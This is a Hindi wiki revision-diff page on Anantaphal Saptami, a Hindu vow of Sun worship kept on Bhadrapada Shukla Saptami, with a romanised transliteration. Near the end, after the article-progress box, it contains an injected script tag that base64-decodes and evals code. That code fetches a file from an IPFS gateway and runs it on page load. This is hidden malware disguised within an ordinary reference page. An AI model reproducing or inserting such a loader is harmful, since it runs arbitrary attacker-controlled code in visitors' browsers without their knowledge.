Difference between revisions of "अनन्तफल सप्तमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (अनन्तफलसप्तमी का नाम बदलकर अनन्तफल सप्तमी कर दिया गया है)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*भाद्र शुक्लपक्ष [[सप्तमी]] के दिन एक वर्ष तक यह व्रत किया जाता है, [[सूर्य देवता]] की पूजा होती है। हेमाद्रि व्रतखण्ड (1, 741, भविष्यपुरान, ब्राह्मपर्व 110|1–8), कृ्त्य कल्पतरु (व्रतखण्ड 148–9)।
+
*[[भाद्रपद]] [[शुक्ल पक्ष]] [[सप्तमी]] के दिन एक वर्ष तक यह व्रत किया जाता है, [[सूर्य देवता]] की पूजा होती है। हेमाद्रि व्रतखण्ड (1, 741, भविष्यपुरान, ब्राह्मपर्व 110|1–8), कृ्त्य कल्पतरु (व्रतखण्ड 148–9)।
  
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 08:53, 6 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • bhadrapad shukl paksh saptami ke din ek varsh tak yah vrat kiya jata hai, soory devata ki pooja hoti hai. hemadri vratakhand (1, 741, bhavishyapuran, brahmaparv 110|1–8), krihty kalpataru (vratakhand 148–9).


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit liank